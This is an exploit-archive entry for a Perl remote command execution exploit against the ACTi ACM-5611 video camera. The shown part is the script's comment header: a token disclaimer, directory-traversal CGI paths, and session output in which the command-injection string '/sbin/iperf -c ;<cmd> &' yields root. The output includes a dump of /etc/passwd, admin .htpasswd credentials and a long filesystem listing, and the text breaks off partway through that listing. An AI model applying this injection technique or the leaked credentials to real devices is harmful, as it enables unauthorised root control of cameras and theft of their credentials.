ACTi ACM-5611 Video Camera Remote Command Execution

2019.09.27
Credit: Todor Donev
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-78

#!/usr/bin/perl # # ACTi ACM-5611 Video Camera Remote Command Execution Exploit # # Copyright 2019 (c) Todor Donev <todor.donev at gmail.com> # # Firmware Version = A1D-220-V3.08.08-AC # Production ID = ACM5611-08G-X-00485 # Factory Default Type = NTSC, Composite, Two Ways Audio (0x71) # Company Name = ACTi Corporation # WEB Site = www.acti.com # Profile ID = MT9M131-RB0_V080507A # # Disclaimer: # This or previous programs are for Educational purpose ONLY. Do not use it without permission. # The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages # caused by direct or indirect use of the information or functionality provided by these programs. # The author or any Internet provider bears NO responsibility for content or misuse of these programs # or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss, # system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's # responsibility. # # Use them at your own risk! # # (Dont do anything without permissions) # # # [ ACTi ACM-5611 Video Camera Remote Command Execution Exploit # # [ ============================================================ # # [ Exploit Author: Todor Donev 2019 <todor.donev@gmail.com> # # [ Server: thttpd/2.25b 29dec2003 # # [ The target is vulnerable # # [ # # [ Directory Traversal # # [ http://192.168.1.1/cgi-bin/./ # # [ http://192.168.1.1/cgi-bin/../ # # [ http://192.168.1.1/cgi-bin/80503736 # # [ http://192.168.1.1/cgi-bin/cmd/ # # [ http://192.168.1.1/cgi-bin/encoder # # [ http://192.168.1.1/cgi-bin/macdev # # [ http://192.168.1.1/cgi-bin/mpeg4 # # [ http://192.168.1.1/cgi-bin/system # # [ http://192.168.1.1/cgi-bin/test # # [ http://192.168.1.1/cgi-bin/update # # [ http://192.168.1.1/cgi-bin/updatem # # [ http://192.168.1.1/cgi-bin/url.cgi # # [ http://192.168.1.1/cgi-bin/videoconfiguration.cgi # # [ http://192.168.1.1/cgi-bin/web1.cgi # # [ # # [ Got root? # # [ # id # # [ execute : /sbin/iperf -c ;id & # # [ uid=0(root) gid=0(root) # # [ # ls -la # # [ execute : /sbin/iperf -c ;ls -la & # # [ -rwxr-xr-x 1 0 0 211088 web1.cgi # # [ -rwxr-xr-x 1 0 0 106124 encoder # # [ -rwxr-xr-x 1 0 0 54084 test # # [ -rwxr-xr-x 1 0 0 79756 mpeg4 # # [ -rwxr-xr-x 1 0 0 89604 system # # [ -rwxr-xr-x 1 0 0 21592 macdev # # [ -rwxr-xr-x 1 0 0 57504 updatem # # [ -rwxr-xr-x 1 0 0 58560 update # # [ lrwxrwxrwx 1 0 0 8 videoconfiguration.cgi -> web1.cgi # # [ lrwxrwxrwx 1 0 0 6 url.cgi -> system # # [ -rwxr-xr-x 1 0 0 52888 80503736 # # [ drwxr-xr-x 2 0 0 1024 cmd # # [ drwxr-xr-x 5 0 0 1024 .. # # [ drw-r--r-- 3 0 0 1024 . # # [ # ls -la /var/log/ # # [ execute : /sbin/iperf -c ;ls -la /var/log/ & # # [ -rw-r--r-- 1 0 0 259 system_info_url.txt # # [ -rw-r--r-- 1 0 0 259 system_info_web.txt # # [ -rw-r--r-- 1 0 0 82 wan_info_brief.txt # # [ -rw-r--r-- 1 0 0 455 systemlog.txt # # [ drwxr-xr-x 5 0 0 1024 .. # # [ drwxr-xr-x 2 0 0 1024 . # # [ # cat /etc/passwd # # [ execute : /sbin/iperf -c ;cat /etc/passwd & # # [ root::0:0:root:/root:/bin/bash # # [ bin:*:1:1:bin:/bin: # # [ daemon:*:2:2:daemon:/usr/sbin: # # [ sys:*:3:3:sys:/dev: # # [ adm:*:4:4:adm:/var/adm: # # [ lp:*:5:7:lp:/var/spool/lpd: # # [ sync:*:6:8:sync:/bin:/bin/sync # # [ shutdown:*:7:9:shutdown:/sbin:/sbin/shutdown # # [ halt:*:8:10:halt:/sbin:/sbin/halt # # [ mail:*:9:11:mail:/var/spool/mail: # # [ news:*:10:12:news:/var/spool/news: # # [ uucp:*:11:13:uucp:/var/spool/uucp: # # [ operator:*:12:0:operator:/root: # # [ games:*:13:100:games:/usr/games: # # [ ftp:*:15:14:ftp:/var/ftp: # # [ man:*:16:100:man:/var/cache/man: # # [ nobody:*:65534:65534:nobody:/home:/bin/sh # # [ # cat cmd/.htpasswd # # [ execute : /sbin/iperf -c ;cat cmd/.htpasswd & # # [ admin:dUHDw321YSAkP # # [ Admin:dUHDw321YSAkP # # [ # find / -type f # # [ execute : /sbin/iperf -c ;find / -type f & # # [ /bin/busybox # # [ /etc/fstab # # [ /etc/thttpd/thttpd.conf # # [ /etc/thttpd/thttpd.throttles # # [ /etc/services # # [ /etc/resolv.conf # # [ /etc/profile # # [ /etc/init.d/rcS # # [ /etc/init.d/bootstrap # # [ /etc/init.d/oem_load # # [ /etc/init.d/system_load # # [ /etc/init.d/thttpd # # [ /etc/init.d/daemon_manager # # [ /etc/init.d/modules # # [ /etc/init.d/ddns # # [ /etc/init.d/syslog # # [ /etc/init.d/hostname # # [ /etc/init.d/set_port_speed # # [ /etc/init.d/get_wan_config # # [ /etc/init.d/myserver # # [ /etc/init.d/wan # # [ /etc/init.d/datetime # # [ /etc/init.d/dns # # [ /etc/init.d/boot_sync # # [ /etc/init.d/profile_load # # [ /etc/init.d/datetime_rackmount # # [ /etc/group # # [ /etc/passwd # # [ /etc/host.conf # # [ /etc/inittab # # [ /etc/ppp/plugins/rp-pppoe.so # # [ /etc/ppp/resolv.conf # # [ /etc/ppp/ip-down # # [ /etc/ppp/ip-up # # [ /etc/protocols # # [ /etc/config/update.conf # # [ /etc/default/default.conf # # [ /etc/default/version # # [ /etc/default/default.pppoe # # [ /etc/default/build_date # # [ /etc/default/global_options # # [ /etc/default/boot_version # # [ /etc/default/profile/camera.bin # # [ /etc/default/profile/firmware.bin # # [ /etc/default/profile/profile_id # # [ /etc/default/profile/NameMap # # [ /etc/default/profile/camera_adj.bin # # [ /etc/default/profile/fw_cap.bin # # [ /etc/default/model # # [ /etc/default/fw_type # # [ /etc/default/device # # [ /etc/default/mac # # [ /etc/default/serial # # [ /etc/default/property # # [ /etc/hosts # # [ /lib/ld-uClibc-0.9.15.so # # [ /lib/libcrypt-0.9.15.so # # [ /lib/libdl-0.9.15.so # # [ /lib/libm-0.9.15.so # # [ /lib/libpthread-0.9.15.so # # [ /lib/libresolv-0.9.15.so # # [ /lib/libuClibc-0.9.15.so # # [ /lib/libutil-0.9.15.so # # [ /lib/modules/2.4.19-rmk4/acap_drv.o # # [ /lib/modules/2.4.19-rmk4/ds1339_rtc.o # # [ /lib/modules/2.4.19-rmk4/sound_drv.o # # [ /proc/mtd # # [ /proc/asoc2200_eth/DATA # # [ /proc/misc # # [ /proc/cpu/alignment # # [ /proc/tty/drivers # # [ /proc/tty/ldiscs # # [ /proc/tty/driver/serial # # [ /proc/sys/abi/fake_utsname # # [ /proc/sys/abi/trace # # [ /proc/sys/abi/defhandler_libcso # # [ /proc/sys/abi/defhandler_lcall7 # # [ /proc/sys/abi/defhandler_elf # # [ /proc/sys/abi/defhandler_coff # # [ /proc/sys/fs/lease-break-time # # [ /proc/sys/fs/dir-notify-enable # # [ /proc/sys/fs/leases-enable # # [ /proc/sys/fs/overflowgid # # [ /proc/sys/fs/overflowuid # # [ /proc/sys/fs/dentry-state # # [ /proc/sys/fs/dquot-nr # # [ /proc/sys/fs/file-max # # [ /proc/sys/fs/file-nr # # [ /proc/sys/fs/inode-state # # [ /proc/sys/fs/inode-nr # # [ /proc/sys/net/unix/max_dgram_qlen # # [ /proc/sys/net/ipv4/conf/eth0/arp_filter # # [ /proc/sys/net/ipv4/conf/eth0/tag # # [ /proc/sys/net/ipv4/conf/eth0/log_martians # # [ /proc/sys/net/ipv4/conf/eth0/bootp_relay # # [ /proc/sys/net/ipv4/conf/eth0/medium_id # # [ /proc/sys/net/ipv4/conf/eth0/proxy_arp # # [ /proc/sys/net/ipv4/conf/eth0/accept_source_route # # [ /proc/sys/net/ipv4/conf/eth0/send_redirects # # [ /proc/sys/net/ipv4/conf/eth0/rp_filter # # [ /proc/sys/net/ipv4/conf/eth0/shared_media # # [ /proc/sys/net/ipv4/conf/eth0/secure_redirects # # [ /proc/sys/net/ipv4/conf/eth0/accept_redirects # # [ /proc/sys/net/ipv4/conf/eth0/mc_forwarding # # [ /proc/sys/net/ipv4/conf/eth0/forwarding # # [ /proc/sys/net/ipv4/conf/default/arp_filter # # [ /proc/sys/net/ipv4/conf/default/tag # # [ /proc/sys/net/ipv4/conf/default/log_martians # # [ /proc/sys/net/ipv4/conf/default/bootp_relay # # [ /proc/sys/net/ipv4/conf/default/medium_id # # [ /proc/sys/net/ipv4/conf/default/proxy_arp # # [ /proc/sys/net/ipv4/conf/default/accept_source_route # # [ /proc/sys/net/ipv4/conf/default/send_redirects # # [ /proc/sys/net/ipv4/conf/default/rp_filter # # [ /proc/sys/net/ipv4/conf/default/shared_media # # [ /proc/sys/net/ipv4/conf/default/secure_redirects # # [ /proc/sys/net/ipv4/conf/default/accept_redirects # # [ /proc/sys/net/ipv4/conf/default/mc_forwarding # # [ /proc/sys/net/ipv4/conf/default/forwarding # # [ /proc/sys/net/ipv4/conf/all/arp_filter # # [ /proc/sys/net/ipv4/conf/all/tag # # [ /proc/sys/net/ipv4/conf/all/log_martians # # [ /proc/sys/net/ipv4/conf/all/bootp_relay # # [ /proc/sys/net/ipv4/conf/all/medium_id # # [ /proc/sys/net/ipv4/conf/all/proxy_arp # # [ /proc/sys/net/ipv4/conf/all/accept_source_route # # [ /proc/sys/net/ipv4/conf/all/send_redirects # # [ /proc/sys/net/ipv4/conf/all/rp_filter # # [ /proc/sys/net/ipv4/conf/all/shared_media # # [ /proc/sys/net/ipv4/conf/all/secure_redirects # # [ /proc/sys/net/ipv4/conf/all/accept_redirects # # [ /proc/sys/net/ipv4/conf/all/mc_forwarding # # [ /proc/sys/net/ipv4/conf/all/forwarding # # [ /proc/sys/net/ipv4/neigh/eth0/locktime # # [ /proc/sys/net/ipv4/neigh/eth0/proxy_delay # # [ /proc/sys/net/ipv4/neigh/eth0/anycast_delay # # [ /proc/sys/net/ipv4/neigh/eth0/proxy_qlen # # [ /proc/sys/net/ipv4/neigh/eth0/unres_qlen # # [ /proc/sys/net/ipv4/neigh/eth0/gc_stale_time # # [ /proc/sys/net/ipv4/neigh/eth0/delay_first_probe_time # # [ /proc/sys/net/ipv4/neigh/eth0/base_reachable_time # # [ /proc/sys/net/ipv4/neigh/eth0/retrans_time # # [ /proc/sys/net/ipv4/neigh/eth0/app_solicit # # [ /proc/sys/net/ipv4/neigh/eth0/ucast_solicit # # [ /proc/sys/net/ipv4/neigh/eth0/mcast_solicit # # [ /proc/sys/net/ipv4/neigh/default/gc_thresh3 # # [ /proc/sys/net/ipv4/neigh/default/gc_thresh2 # # [ /proc/sys/net/ipv4/neigh/default/gc_thresh1 # # [ /proc/sys/net/ipv4/neigh/default/gc_interval # # [ /proc/sys/net/ipv4/neigh/default/locktime # # [ /proc/sys/net/ipv4/neigh/default/proxy_delay # # [ /proc/sys/net/ipv4/neigh/default/anycast_delay # # [ /proc/sys/net/ipv4/neigh/default/proxy_qlen # # [ /proc/sys/net/ipv4/neigh/default/unres_qlen # # [ /proc/sys/net/ipv4/neigh/default/gc_stale_time # # [ /proc/sys/net/ipv4/neigh/default/delay_first_probe_time # # [ /proc/sys/net/ipv4/neigh/default/base_reachable_time # # [ /proc/sys/net/ipv4/neigh/default/retrans_time # # [ /proc/sys/net/ipv4/neigh/default/app_solicit # # [ /proc/sys/net/ipv4/neigh/default/ucast_solicit # # [ /proc/sys/net/ipv4/neigh/default/mcast_solicit # # [ /proc/sys/net/ipv4/tcp_tw_reuse # # [ /proc/sys/net/ipv4/icmp_ratemask # # [ /proc/sys/net/ipv4/icmp_ratelimit # # [ /proc/sys/net/ipv4/tcp_adv_win_scale # # [ /proc/sys/net/ipv4/tcp_app_win # # [ /proc/sys/net/ipv4/tcp_rmem # # [ /proc/sys/net/ipv4/tcp_wmem # # [ /proc/sys/net/ipv4/tcp_mem # # [ /proc/sys/net/ipv4/tcp_dsack # # [ /proc/sys/net/ipv4/tcp_ecn # # [ /proc/sys/net/ipv4/tcp_reordering # # [ /proc/sys/net/ipv4/tcp_fack # # [ /proc/sys/net/ipv4/tcp_orphan_retries # # [ /proc/sys/net/ipv4/inet_peer_gc_maxtime # # [ /proc/sys/net/ipv4/inet_peer_gc_mintime # # [ /proc/sys/net/ipv4/inet_peer_maxttl # # [ /proc/sys/net/ipv4/inet_peer_minttl # # [ /proc/sys/net/ipv4/inet_peer_threshold # # [ /proc/sys/net/ipv4/route/min_adv_mss # # [ /proc/sys/net/ipv4/route/min_pmtu # # [ /proc/sys/net/ipv4/route/mtu_expires # # [ /proc/sys/net/ipv4/route/gc_elasticity # # [ /proc/sys/net/ipv4/route/error_burst # # [ /proc/sys/net/ipv4/route/error_cost # # [ /proc/sys/net/ipv4/route/redirect_silence # # [ /proc/sys/net/ipv4/route/redirect_number # # [ /proc/sys/net/ipv4/route/redirect_load # # [ /proc/sys/net/ipv4/route/gc_interval # # [ /proc/sys/net/ipv4/route/gc_timeout # # [ /proc/sys/net/ipv4/route/gc_min_interval # # [ /proc/sys/net/ipv4/route/max_size # # [ /proc/sys/net/ipv4/route/gc_thresh # # [ /proc/sys/net/ipv4/route/max_delay # # [ /proc/sys/net/ipv4/route/min_delay # # [ /proc/sys/net/ipv4/route/flush # # [ /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses # # [ /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts # # [ /proc/sys/net/ipv4/icmp_echo_ignore_all # # [ /proc/sys/net/ipv4/ip_local_port_range # # [ /proc/sys/net/ipv4/tcp_max_syn_backlog # # [ /proc/sys/net/ipv4/tcp_rfc1337 # # [ /proc/sys/net/ipv4/tcp_stdurg # # [ /proc/sys/net/ipv4/tcp_abort_on_overflow # # [ /proc/sys/net/ipv4/tcp_tw_recycle # # [ /proc/sys/net/ipv4/tcp_fin_timeout # # [ /proc/sys/net/ipv4/tcp_retries2 # # [ /proc/sys/net/ipv4/tcp_retries1 # # [ /proc/sys/net/ipv4/tcp_keepalive_intvl # # [ /proc/sys/net/ipv4/tcp_keepalive_probes # # [ /proc/sys/net/ipv4/tcp_keepalive_time # # [ /proc/sys/net/ipv4/ipfrag_time # # [ /proc/sys/net/ipv4/ip_dynaddr # # [ /proc/sys/net/ipv4/ipfrag_low_thresh # # [ /proc/sys/net/ipv4/ipfrag_high_thresh # # [ /proc/sys/net/ipv4/tcp_max_tw_buckets # # [ /proc/sys/net/ipv4/tcp_max_orphans # # [ /proc/sys/net/ipv4/tcp_synack_retries # # [ /proc/sys/net/ipv4/tcp_syn_retries # # [ /proc/sys/net/ipv4/ip_nonlocal_bind # # [ /proc/sys/net/ipv4/ip_no_pmtu_disc # # [ /proc/sys/net/ipv4/ip_autoconfig # # [ /proc/sys/net/ipv4/ip_default_ttl # # [ /proc/sys/net/ipv4/ip_forward # # [ /proc/sys/net/ipv4/tcp_retrans_collapse # # [ /proc/sys/net/ipv4/tcp_sack # # [ /proc/sys/net/ipv4/tcp_window_scaling # # [ /proc/sys/net/ipv4/tcp_timestamps # # [ /proc/sys/net/core/hot_list_length # # [ /proc/sys/net/core/optmem_max # # [ /proc/sys/net/core/message_burst # # [ /proc/sys/net/core/message_cost # # [ /proc/sys/net/core/mod_cong # # [ /proc/sys/net/core/lo_cong # # [ /proc/sys/net/core/no_cong # # [ /proc/sys/net/core/no_cong_thresh # # [ /proc/sys/net/core/netdev_max_backlog # # [ /proc/sys/net/core/rmem_default # # [ /proc/sys/net/core/wmem_default # # [ /proc/sys/net/core/rmem_max # # [ /proc/sys/net/core/wmem_max # # [ /proc/sys/vm/max_map_count # # [ /proc/sys/vm/max-readahead # # [ /proc/sys/vm/min-readahead # # [ /proc/sys/vm/page-cluster # # [ /proc/sys/vm/pagetable_cache # # [ /proc/sys/vm/kswapd # # [ /proc/sys/vm/overcommit_memory # # [ /proc/sys/vm/bdflush # # [ /proc/sys/kernel/overflowgid # # [ /proc/sys/kernel/overflowuid # # [ /proc/sys/kernel/random/uuid # # [ /proc/sys/kernel/random/boot_id # # [ /proc/sys/kernel/random/write_wakeup_threshold # # [ /proc/sys/kernel/random/read_wakeup_threshold # # [ /proc/sys/kernel/random/entropy_avail # # [ /proc/sys/kernel/random/poolsize # # [ /proc/sys/kernel/threads-max # # [ /proc/sys/kernel/cad_pid # # [ /proc/sys/kernel/sem # # [ /proc/sys/kernel/msgmnb # # [ /proc/sys/kernel/msgmni # # [ /proc/sys/kernel/msgmax # # [ /proc/sys/kernel/shmmni # # [ /proc/sys/kernel/shmall # # [ /proc/sys/kernel/shmmax # # [ /proc/sys/kernel/rtsig-max # # [ /proc/sys/kernel/rtsig-nr # # [ /proc/sys/kernel/printk # # [ /proc/sys/kernel/ctrl-alt-del # # [ /proc/sys/kernel/real-root-dev # # [ /proc/sys/kernel/cap-bound # # [ /proc/sys/kernel/tainted # # [ /proc/sys/kernel/core_uses_pid # # [ /proc/sys/kernel/panic # # [ /proc/sys/kernel/domainname # # [ /proc/sys/kernel/hostname # # [ /proc/sys/kernel/version # # [ /proc/sys/kernel/osrelease # # [ /proc/sys/kernel/ostype # # [ /proc/sysvipc/shm # # [ /proc/sysvipc/msg # # [ /proc/sysvipc/sem # # [ /proc/net/packet # # [ /proc/net/unix # # [ /proc/net/udp # # [ /proc/net/tcp # # [ /proc/net/sockstat # # [ /proc/net/snmp # # [ /proc/net/netstat # # [ /proc/net/raw # # [ /proc/net/rt_cache_stat # # [ /proc/net/rt_cache # # [ /proc/net/route # # [ /proc/net/arp # # [ /proc/net/netlink # # [ /proc/net/pppoe # # [ /proc/net/dev_mcast # # [ /proc/net/softnet_stat # # [ /proc/net/dev # # [ /proc/kcore # # [ /proc/ksyms # # [ /proc/slabinfo # # [ /proc/cpuinfo # # [ /proc/kmsg # # [ /proc/execdomains # # [ /proc/iomem # # [ /proc/swaps # # [ /proc/locks # # [ /proc/cmdline # # [ /proc/ioports # # [ /proc/filesystems # # [ /proc/interrupts # # [ /proc/partitions # # [ /proc/devices # # [ /proc/stat # # [ /proc/modules # # [ /proc/version # # [ /proc/meminfo # # [ /proc/uptime # # [ /proc/loadavg # # [ /proc/1/environ # # [ /proc/1/status # # [ /proc/1/cmdline # # [ /proc/1/stat # # [ /proc/1/statm # # [ /proc/1/maps # # [ /proc/1/mem # # [ /proc/1/mounts # # [ /proc/2/environ # # [ /proc/2/status # # [ /proc/2/cmdline # # [ /proc/2/stat # # [ /proc/2/statm # # [ /proc/2/maps # # [ /proc/2/mem # # [ /proc/2/mounts # # [ /proc/3/environ # # [ /proc/3/status # # [ /proc/3/cmdline # # [ /proc/3/stat # # [ /proc/3/statm # # [ /proc/3/maps # # [ /proc/3/mem # # [ /proc/3/mounts # # [ /proc/4/environ # # [ /proc/4/status # # [ /proc/4/cmdline # # [ /proc/4/stat # # [ /proc/4/statm # # [ /proc/4/maps # # [ /proc/4/mem # # [ /proc/4/mounts # # [ /proc/5/environ # # [ /proc/5/status # # [ /proc/5/cmdline # # [ /proc/5/stat # # [ /proc/5/statm # # [ /proc/5/maps # # [ /proc/5/mem # # [ /proc/5/mounts # # [ /proc/6/environ # # [ /proc/6/status # # [ /proc/6/cmdline # # [ /proc/6/stat # # [ /proc/6/statm # # [ /proc/6/maps # # [ /proc/6/mem # # [ /proc/6/mounts # # [ find: /proc/7/fd: No such file or directory # # [ /proc/7/environ # # [ /proc/7/status # # [ /proc/7/cmdline # # [ /proc/7/stat # # [ /proc/7/statm # # [ /proc/7/maps # # [ /proc/7/mem # # [ /proc/7/mounts # # [ /proc/14/environ # # [ /proc/14/status # # [ /proc/14/cmdline # # [ /proc/14/stat # # [ /proc/14/statm # # [ /proc/14/maps # # [ /proc/14/mem # # [ /proc/14/mounts # # [ /proc/132/environ # # [ /proc/132/status # # [ /proc/132/cmdline # # [ /proc/132/stat # # [ /proc/132/statm # # [ /proc/132/maps # # [ /proc/132/mem # # [ /proc/132/mounts # # [ /proc/142/environ # # [ /proc/142/status # # [ /proc/142/cmdline # # [ /proc/142/stat # # [ /proc/142/statm # # [ /proc/142/maps # # [ /proc/142/mem # # [ /proc/142/mounts # # [ /proc/153/environ # # [ /proc/153/status # # [ /proc/153/cmdline # # [ /proc/153/stat # # [ /proc/153/statm # # [ /proc/153/maps # # [ /proc/153/mem # # [ /proc/153/mounts # # [ /proc/154/environ # # [ /proc/154/status # # [ /proc/154/cmdline # # [ /proc/154/stat # # [ /proc/154/statm # # [ /proc/154/maps # # [ /proc/154/mem # # [ /proc/154/mounts # # [ /proc/157/environ # # [ /proc/157/status # # [ /proc/157/cmdline # # [ /proc/157/stat # # [ /proc/157/statm # # [ /proc/157/maps # # [ /proc/157/mem # # [ /proc/157/mounts # # [ /proc/164/environ # # [ /proc/164/status # # [ /proc/164/cmdline # # [ /proc/164/stat # # [ /proc/164/statm # # [ /proc/164/maps # # [ /proc/164/mem # # [ /proc/164/mounts # # [ /proc/171/environ # # [ /proc/171/status # # [ /proc/171/cmdline # # [ /proc/171/stat # # [ /proc/171/statm # # [ /proc/171/maps # # [ /proc/171/mem # # [ /proc/171/mounts # # [ /proc/172/environ # # [ /proc/172/status # # [ /proc/172/cmdline # # [ /proc/172/stat # # [ /proc/172/statm # # [ /proc/172/maps # # [ /proc/172/mem # # [ /proc/172/mounts # # [ /proc/173/environ # # [ /proc/173/status # # [ /proc/173/cmdline # # [ /proc/173/stat # # [ /proc/173/statm # # [ /proc/173/maps # # [ /proc/173/mem # # [ /proc/173/mounts # # [ /proc/174/environ # # [ /proc/174/status # # [ /proc/174/cmdline # # [ /proc/174/stat # # [ /proc/174/statm # # [ /proc/174/maps # # [ /proc/174/mem # # [ /proc/174/mounts # # [ /proc/175/environ # # [ /proc/175/status # # [ /proc/175/cmdline # # [ /proc/175/stat # # [ /proc/175/statm # # [ /proc/175/maps # # [ /proc/175/mem # # [ /proc/175/mounts # # [ /proc/16706/environ # # [ /proc/16706/status # # [ /proc/16706/cmdline # # [ /proc/16706/stat # # [ /proc/16706/statm # # [ /proc/16706/maps # # [ /proc/16706/mem # # [ /proc/16706/mounts # # [ /proc/16707/environ # # [ /proc/16707/status # # [ /proc/16707/cmdline # # [ /proc/16707/stat # # [ /proc/16707/statm # # [ /proc/16707/maps # # [ /proc/16707/mem # # [ /proc/16707/mounts # # [ /proc/16708/environ # # [ /proc/16708/status # # [ /proc/16708/cmdline # # [ /proc/16708/stat # # [ /proc/16708/statm # # [ /proc/16708/maps # # [ /proc/16708/mem # # [ /proc/16708/mounts # # [ /proc/16709/environ # # [ /proc/16709/status # # [ /proc/16709/cmdline # # [ /proc/16709/stat # # [ /proc/16709/statm # # [ /proc/16709/maps # # [ /proc/16709/mem # # [ /proc/16709/mounts # # [ /proc/26139/environ # # [ /proc/26139/status # # [ /proc/26139/cmdline # # [ /proc/26139/stat # # [ /proc/26139/statm # # [ /proc/26139/maps # # [ /proc/26139/mem # # [ /proc/26139/mounts # # [ /proc/29140/environ # # [ /proc/29140/status # # [ /proc/29140/cmdline # # [ /proc/29140/stat # # [ /proc/29140/statm # # [ /proc/29140/maps # # [ /proc/29140/mem # # [ /proc/29140/mounts # # [ /proc/29176/environ # # [ /proc/29176/status # # [ /proc/29176/cmdline # # [ /proc/29176/stat # # [ /proc/29176/statm # # [ /proc/29176/maps # # [ /proc/29176/mem # # [ /proc/29176/mounts # # [ /proc/7727/environ # # [ /proc/7727/status # # [ /proc/7727/cmdline # # [ /proc/7727/stat # # [ /proc/7727/statm # # [ /proc/7727/maps # # [ /proc/7727/mem # # [ /proc/7727/mounts # # [ /proc/7728/environ # # [ /proc/7728/status # # [ /proc/7728/cmdline # # [ /proc/7728/stat # # [ /proc/7728/statm # # [ /proc/7728/maps # # [ /proc/7728/mem # # [ /proc/7728/mounts # # [ /proc/7729/environ # # [ /proc/7729/status # # [ /proc/7729/cmdline # # [ /proc/7729/stat # # [ /proc/7729/statm # # [ /proc/7729/maps # # [ /proc/7729/mem # # [ /proc/7729/mounts # # [ /proc/23419/environ # # [ /proc/23419/status # # [ /proc/23419/cmdline # # [ /proc/23419/stat # # [ /proc/23419/statm # # [ /proc/23419/maps # # [ /proc/23419/mem # # [ /proc/23419/mounts # # [ /proc/14789/environ # # [ /proc/14789/status # # [ /proc/14789/cmdline # # [ /proc/14789/stat # # [ /proc/14789/statm # # [ /proc/14789/maps # # [ /proc/14789/mem # # [ /proc/14789/mounts # # [ /proc/14790/environ # # [ /proc/14790/status # # [ /proc/14790/cmdline # # [ /proc/14790/stat # # [ /proc/14790/statm # # [ /proc/14790/maps # # [ /proc/14790/mem # # [ /proc/14790/mounts # # [ /proc/14791/environ # # [ /proc/14791/status # # [ /proc/14791/cmdline # # [ /proc/14791/stat # # [ /proc/14791/statm # # [ /proc/14791/maps # # [ /proc/14791/mem # # [ /proc/14791/mounts # # [ /proc/16682/environ # # [ /proc/16682/status # # [ /proc/16682/cmdline # # [ /proc/16682/stat # # [ /proc/16682/statm # # [ /proc/16682/maps # # [ /proc/16682/mem # # [ /proc/16682/mounts # # [ /proc/22978/environ # # [ /proc/22978/status # # [ /proc/22978/cmdline # # [ /proc/22978/stat # # [ /proc/22978/statm # # [ /proc/22978/maps # # [ /proc/22978/mem # # [ /proc/22978/mounts # # [ /proc/22979/environ # # [ /proc/22979/status # # [ /proc/22979/cmdline # # [ /proc/22979/stat # # [ /proc/22979/statm # # [ /proc/22979/maps # # [ /proc/22979/mem # # [ /proc/22979/mounts # # [ /proc/27240/environ # # [ /proc/27240/status # # [ /proc/27240/cmdline # # [ /proc/27240/stat # # [ /proc/27240/statm # # [ /proc/27240/maps # # [ /proc/27240/mem # # [ /proc/27240/mounts # # [ /proc/27241/environ # # [ /proc/27241/status # # [ /proc/27241/cmdline # # [ /proc/27241/stat # # [ /proc/27241/statm # # [ /proc/27241/maps # # [ /proc/27241/mem # # [ /proc/27241/mounts # # [ /proc/20414/environ # # [ /proc/20414/status # # [ /proc/20414/cmdline # # [ /proc/20414/stat # # [ /proc/20414/statm # # [ /proc/20414/maps # # [ /proc/20414/mem # # [ /proc/20414/mounts # # [ /proc/9117/environ # # [ /proc/9117/status # # [ /proc/9117/cmdline # # [ /proc/9117/stat # # [ /proc/9117/statm # # [ /proc/9117/maps # # [ /proc/9117/mem # # [ /proc/9117/mounts # # [ /proc/9120/environ # # [ /proc/9120/status # # [ /proc/9120/cmdline # # [ /proc/9120/stat # # [ /proc/9120/statm # # [ /proc/9120/maps # # [ /proc/9120/mem # # [ /proc/9120/mounts # # [ /sbin/dhcpcd # # [ /sbin/ez-ipupdate # # [ /sbin/htpasswd # # [ /sbin/iperf # # [ /sbin/thttpd # # [ /usr/sbin/mount_nfs_drive # # [ /usr/sbin/ll # # [ /usr/sbin/system_info # # [ /usr/sbin/read_dev_info # # [ /usr/sbin/acti_config # # [ /usr/sbin/show_progress # # [ /usr/sbin/ddns_monitor # # [ /usr/sbin/wan_status # # [ /usr/sbin/adsl-connect # # [ /usr/sbin/adsl-setup # # [ /usr/sbin/acti_report # # [ /usr/sbin/pppd # # [ /usr/sbin/pppoe # # [ /usr/sbin/acti_upgrade # # [ /usr/sbin/thttpd_monitor # # [ /usr/sbin/acti_485 # # [ /usr/sbin/dbg # # [ /usr/sbin/ntpclient # # [ /usr/sbin/acti_upgradem # # [ /usr/sbin/dhcp_retry # # [ /usr/sbin/pppoe_monitor # # [ /usr/sbin/acti_reboot # # [ /usr/sbin/acti_msg # # [ /usr/sbin/mount_tmpfs # # [ /usr/sbin/shell_relay # # [ /usr/sbin/acti_logger # # [ /usr/sbin/boot_ctrl # # [ /usr/sbin/acti_gpio # # [ /usr/sbin/acti_rs485 # # [ /usr/sbin/acti_rtc # # [ /usr/sbin/acti_reg # # [ /usr/sbin/conf_sync # # [ /usr/sbin/conf_convert # # [ /usr/sbin/bin2devinfo # # [ /usr/sbin/audio_tester # # [ /usr/sbin/bin2profile # # [ /usr/sbin/acti-server # # [ /usr/bin/setsid # # [ /var/run/dev.bin # # [ /var/run/system_type # # [ /var/run/channel # # [ /var/run/sys_conf.bin # # [ /var/run/wan_state # # [ /var/run/wanip_config # # [ /var/run/encoder_run # # [ /var/log/systemlog.txt # # [ /var/log/wan_info_brief.txt # # [ /var/log/system_info_web.txt # # [ /var/log/system_info_url.txt # # [ /var/www/images/Space.gif # # [ /var/www/images/bar.gif # # [ /var/www/images/bar2.gif # # [ /var/www/images/icon.gif # # [ /var/www/images/layout.gif # # [ /var/www/images/r0-100.gif # # [ /var/www/images/header_red.jpg # # [ /var/www/images/ie_error.bmp # # [ /var/www/images/r0-255.gif # # [ /var/www/images/ptz_center_1.gif # # [ /var/www/images/ptz_down_1.gif # # [ /var/www/images/ptz_left_1.gif # # [ /var/www/images/ptz_leftdown_1.gif # # [ /var/www/images/ptz_leftup_1.gif # # [ /var/www/images/ptz_right_1.gif # # [ /var/www/images/ptz_rightdown_1.gif # # [ /var/www/images/ptz_rightup_1.gif # # [ /var/www/images/ptz_up_1.gif # # [ /var/www/images/add.jpg # # [ /var/www/images/delete.jpg # # [ /var/www/images/focusin.jpg # # [ /var/www/images/focusout.jpg # # [ /var/www/images/home.jpg # # [ /var/www/images/reset.jpg # # [ /var/www/images/tele.jpg # # [ /var/www/images/wide.jpg # # [ /var/www/images/Num00.jpg # # [ /var/www/images/Num01.jpg # # [ /var/www/cgi-bin/cmd/system # # [ /var/www/cgi-bin/cmd/mpeg4 # # [ /var/www/cgi-bin/cmd/encoder # # [ /var/www/cgi-bin/cmd/.htpasswd # # [ /var/www/cgi-bin/80503736 # # [ /var/www/cgi-bin/update # # [ /var/www/cgi-bin/updatem # # [ 